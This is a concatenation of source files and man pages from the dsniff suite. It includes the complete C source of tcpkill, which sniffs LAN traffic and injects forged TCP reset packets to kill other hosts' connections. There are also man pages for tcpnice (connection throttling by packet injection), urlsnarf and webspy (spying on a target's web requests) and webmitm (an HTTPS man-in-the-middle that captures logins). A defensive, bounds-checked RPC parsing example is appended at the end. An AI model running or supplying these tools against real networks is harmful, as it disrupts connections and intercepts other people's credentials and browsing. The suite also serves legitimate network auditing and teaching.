.TH TCPKILL 8
.ad
.fi
.SH NAME
tcpkill
\-
kill TCP connections on a LAN
.SH SYNOPSIS
.na
.nf
.fi
\fBtcpkill\fR [\fB-i \fIinterface\fR] [\fB-1\fR...\fB9\fR] \fIexpression\fR
.SH DESCRIPTION
.ad
.fi
\fBtcpkill\fR kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for TCB
creation).
.SH OPTIONS
.IP "\fB-i \fIinterface\fR"
Specify the interface to listen on.
.IP \fB-1\fR...\fB9\fR
Specify the degree of brute force to use in killing a connection. Fast
connections may require a higher number in order to land a RST in the
moving receive window. Default is 3.
.IP \fIexpression\fR
Specify a tcpdump(8) filter expression to select the connections to
kill.
.SH "SEE ALSO"
dsniff(8), tcpnice(8)
.SH AUTHOR
.na
.nf
Dug Song
--------------------------------------------------------------------------------
/tcpkill.c:
--------------------------------------------------------------------------------
/*
 * tcpkill.c
 *
 * Kill TCP connections already in progress.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: tcpkill.c,v 1.17 2001/03/17 08:10:43 dugsong Exp $
 */

#include "config.h"

#include <sys/types.h>

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <err.h>
#include <libnet.h>
#include <pcap.h>

#include "pcaputil.h"

#define DEFAULT_SEVERITY 3

int Opt_severity = DEFAULT_SEVERITY;
int pcap_off;

static void
usage(void)
{
    fprintf(stderr, "Version: " VERSION "\n"
        "Usage: tcpkill [-i interface] [-1..9] expression\n");
    exit(1);
}

static void
tcp_kill_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt)
{
    struct libnet_ipv4_hdr *ip;
    struct libnet_tcp_hdr *tcp;
    char ctext[64];
    u_int32_t seq, win;
    int i, len;
    libnet_t *l;

    l = (libnet_t *)user;
    pkt += pcap_off;
    len = pcap->caplen - pcap_off;

    ip = (struct libnet_ipv4_hdr *)pkt;
    if (ip->ip_p != IPPROTO_TCP)
        return;

    tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2));
    if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST))
        return;

    seq = ntohl(tcp->th_ack);
    win = ntohs(tcp->th_win);

    snprintf(ctext, sizeof(ctext), "%s:%d > %s:%d:",
        libnet_addr2name4(ip->ip_src.s_addr, LIBNET_DONT_RESOLVE),
        ntohs(tcp->th_sport),
        libnet_addr2name4(ip->ip_dst.s_addr, LIBNET_DONT_RESOLVE),
        ntohs(tcp->th_dport));

    for (i = 0; i < Opt_severity; i++) {
        seq += (i * win);

        libnet_clear_packet(l);

        libnet_build_tcp(ntohs(tcp->th_dport), ntohs(tcp->th_sport),
            seq, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H,
            NULL, 0, l, 0);

        libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0,
            libnet_get_prand(LIBNET_PRu16), 0, 64,
            IPPROTO_TCP, 0, ip->ip_dst.s_addr,
            ip->ip_src.s_addr, NULL, 0, l, 0);

        if (libnet_write(l) < 0)
            warn("write");

        /* seq is a 32-bit value, so print it with %u rather than %lu. */
        fprintf(stderr, "%s R %u:%u(0) win 0\n", ctext, seq, seq);
    }
}

int
main(int argc, char *argv[])
{
    extern char *optarg;
    extern int optind;
    int c;
    char *p, *intf, *filter, ebuf[PCAP_ERRBUF_SIZE];
    char libnet_ebuf[LIBNET_ERRBUF_SIZE];
    libnet_t *l;
    pcap_t *pd;

    intf = NULL;

    while ((c = getopt(argc, argv, "i:123456789h?V")) != -1) {
        switch (c) {
        case 'i':
            intf = optarg;
            break;
        case '0': case '1': case '2': case '3': case '4':
        case '5': case '6': case '7': case '8': case '9':
            p = argv[optind - 1];
            if (p[0] == '-' && p[1] == c && p[2] == '\0')
                Opt_severity = atoi(++p);
            else
                Opt_severity = atoi(argv[optind] + 1);
            break;
        default:
            usage();
            break;
        }
    }
    if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL)
        errx(1, "%s", ebuf);

    argc -= optind;
    argv += optind;

    if (argc == 0)
        usage();

    filter = copy_argv(argv);

    if ((pd = pcap_init_dsniff(intf, filter, 64)) == NULL)
        errx(1, "couldn't initialize sniffing");

    if ((pcap_off = pcap_dloff(pd)) < 0)
        errx(1, "couldn't determine link layer offset");

    if ((l = libnet_init(LIBNET_RAW4, intf, libnet_ebuf)) == NULL)
        errx(1, "couldn't initialize sending");

    libnet_seed_prand(l);

    warnx("listening on %s [%s]", intf, filter);

    pcap_loop(pd, -1, tcp_kill_cb, (u_char *)l);

    /* NOTREACHED */

    exit(0);
}
--------------------------------------------------------------------------------
/tcpnice.8:
--------------------------------------------------------------------------------
.TH TCPNICE 8
.ad
.fi
.SH NAME
tcpnice
\-
slow down TCP connections on a LAN
.SH SYNOPSIS
.na
.nf
.fi
\fBtcpnice\fR [\fB-A\fR] [\fB-I\fR] [\fB-M\fR] [\fB-i \fIinterface\fR]
\fIexpression\fR
.SH DESCRIPTION
.ad
.fi
\fBtcpnice\fR slows down specified TCP connections on a LAN via
"active" traffic shaping.
.SH OPTIONS
.IP \fB-A\fR
Inject TCP tiny window advertisements.
.IP \fB-I\fR
Inject ICMP source quench replies.
.IP \fB-M\fR
Inject ICMP fragmentation-needed replies with tiny next-hop MTUs.
.IP "\fB-i \fIinterface\fR"
Specify the interface to listen on.
.IP \fIexpression\fR
Specify a tcpdump(8) filter expression to select the connections to
slow down.
.LP
If no attack type is given, all attacks will be enabled.
.SH "SEE ALSO"
dsniff(8), tcpkill(8)
.SH AUTHOR
.na
.nf
Dug Song
--------------------------------------------------------------------------------
/trigger.h:
--------------------------------------------------------------------------------
/*
 * trigger.h
 *
 * Trigger interface.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: trigger.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $
 */

#ifndef TRIGGER_H
#define TRIGGER_H

#define TRIGGER_TCP_RAW_TIMEOUT 10

void trigger_init_list(char *list);
void trigger_init_magic(char *filename);
void trigger_init_services(char *filename);

void trigger_dump(void);

int trigger_set_ip(int proto, char *name);
int trigger_set_udp(int port, char *name);
int trigger_set_tcp(int port, char *name);
int trigger_set_rpc(int program, char *name);

void trigger_ip(struct libnet_ipv4_hdr *ip);
void trigger_udp(struct libnet_ipv4_hdr *ip);
void trigger_tcp(struct tcp_stream *ts, void **conn_save);
void trigger_tcp_raw(struct libnet_ipv4_hdr *ip);
void trigger_tcp_raw_timeout(int signal);
void trigger_rpc(int program, int proto, int port);

#endif /* TRIGGER_H */
--------------------------------------------------------------------------------
/urlsnarf.8:
--------------------------------------------------------------------------------
.TH URLSNARF 8
.ad
.fi
.SH NAME
urlsnarf
\-
sniff HTTP requests in Common Log Format
.SH SYNOPSIS
.na
.nf
.fi
\fBurlsnarf\fR [\fB-n\fR] [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern\fR [\fIexpression\fR]]
.SH DESCRIPTION
.ad
.fi
\fBurlsnarf\fR outputs all requested URLs sniffed from HTTP traffic in
CLF (Common Log Format, used by almost all web servers), suitable for
offline post-processing with your favorite web log analysis tool
(analog, wwwstat, etc.).
.SH OPTIONS
.IP \fB-n\fR
Do not resolve IP addresses to hostnames.
.IP "\fB-i \fIinterface\fR"
Specify the interface to listen on.
.IP "\fB-p \fIpcapfile\fR"
Process packets from the specified PCAP capture file instead of the network.
.IP \fB-v\fR
"Versus" mode. Invert the sense of matching, to select non-matching
URLs.
.IP \fIpattern\fR
Specify regular expression for URL matching.
.IP "\fIexpression\fR"
Specify a tcpdump(8) filter expression to select traffic to sniff.
.SH "SEE ALSO"
dsniff(8)
.SH AUTHOR
.na
.nf
Dug Song
--------------------------------------------------------------------------------
/webmitm.8:
--------------------------------------------------------------------------------
.TH WEBMITM 8
.ad
.fi
.SH NAME
webmitm
\-
HTTP / HTTPS monkey-in-the-middle
.SH SYNOPSIS
.na
.nf
.fi
\fBwebmitm\fR [\fB-d\fR] [\fBhost\fR]
.SH DESCRIPTION
.ad
.fi
\fBwebmitm\fR transparently proxies and sniffs HTTP / HTTPS traffic
redirected by dnsspoof(8), capturing most "secure" SSL-encrypted
webmail logins and form submissions.
.SH OPTIONS
.IP \fB-d\fR
Enable debugging mode.
May be specified multiple times to greater
effect.
.IP \fBhost\fR
Specify a host to proxy to. If none given, only requests containing an
HTTP/1.1 Host: header or absolute URI will be relayed transparently.
.SH FILES
.IP \fIwebmitm.crt\fR
SSL certificate
.SH "SEE ALSO"
dsniff(8), dnsspoof(8)
.SH AUTHOR
.na
.nf
Dug Song
--------------------------------------------------------------------------------
/webspy.8:
--------------------------------------------------------------------------------
.TH WEBSPY 8
.ad
.fi
.SH NAME
webspy
\-
display sniffed URLs in Netscape in real-time
.SH SYNOPSIS
.na
.nf
.fi
\fBwebspy\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] \fIhost\fR
.SH DESCRIPTION
.ad
.fi
\fBwebspy\fR sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target surfs, your
browser surfs along with them, automagically). Netscape must be
running on your local X display ahead of time.
.SH OPTIONS
.IP "\fB-i \fIinterface\fR"
Specify the interface to listen on.
.IP "\fB-p \fIpcapfile\fR"
Process packets from the specified PCAP capture file instead of the network.
.IP \fIhost\fR
Specify the web client to spy on.
.SH "SEE ALSO"
dsniff(8)
.SH AUTHOR
.na
.nf
Dug Song
--------------------------------------------------------------------------------
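The record defragmentation loop in rpc.c's rpc_decode() walks RPC-over-TCP record-marking headers with the FRAGLEN and LASTFRAG macros from rpc.h. The block below is an added example, not code from dsniff: it performs the same step on untrusted captured bytes with every length checked against what is left in the input and output buffers. The names rm_defragment and rd_be32 and the sample byte arrays are assumptions made for illustration, and unlike rpc_decode() it copies into a separate output buffer instead of compacting in place.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Record-marking header: top bit = last fragment, low 31 bits = length. */
#define RM_FRAGLEN(h)   ((uint32_t)(h) & 0x7fffffffU)
#define RM_LASTFRAG(h)  (((uint32_t)(h) & 0x80000000U) != 0)

/* Constructed sample: "abc" (more to come), then "de" (last fragment). */
static const unsigned char sample_two_frags[] = {
    0x00, 0x00, 0x00, 0x03, 'a', 'b', 'c',
    0x80, 0x00, 0x00, 0x02, 'd', 'e'
};

/* Constructed sample: header claims 0x7fffffff bytes, only 4 follow. */
static const unsigned char sample_oversized[] = {
    0x7f, 0xff, 0xff, 0xff, 0x01, 0x02, 0x03, 0x04
};

/* Read a big-endian 32-bit word without alignment assumptions. */
static uint32_t
rd_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/*
 * Strip record-marking headers from in[0..inlen) and append each fragment's
 * payload to out[0..outcap).  Returns the joined payload length, or -1 if a
 * header is truncated, a fragment runs past the input, the output is too
 * small, or the input ends before a last-fragment header is seen.
 */
long
rm_defragment(const unsigned char *in, size_t inlen,
    unsigned char *out, size_t outcap)
{
    size_t off = 0, total = 0;

    for (;;) {
        uint32_t hdr, flen;

        /* Comparisons are phrased as subtractions so they cannot wrap. */
        if (inlen - off < 4)
            return -1;              /* truncated header */
        hdr = rd_be32(in + off);
        off += 4;

        flen = RM_FRAGLEN(hdr);
        if (flen > inlen - off)
            return -1;              /* length field exceeds captured data */
        if (flen > outcap - total)
            return -1;              /* would overflow the output buffer */

        memcpy(out + total, in + off, flen);
        off += flen;
        total += flen;

        /* Each pass consumes at least 4 bytes, so the loop terminates. */
        if (RM_LASTFRAG(hdr))
            return (long)total;
    }
}

int
main(void)
{
    unsigned char out[16];
    long n;

    n = rm_defragment(sample_two_frags, sizeof(sample_two_frags),
        out, sizeof(out));
    printf("two fragments -> %ld bytes: %.*s\n", n, (int)n, (char *)out);

    n = rm_defragment(sample_oversized, sizeof(sample_oversized),
        out, sizeof(out));
    printf("oversized length field -> %ld\n", n);
    return 0;
}
```
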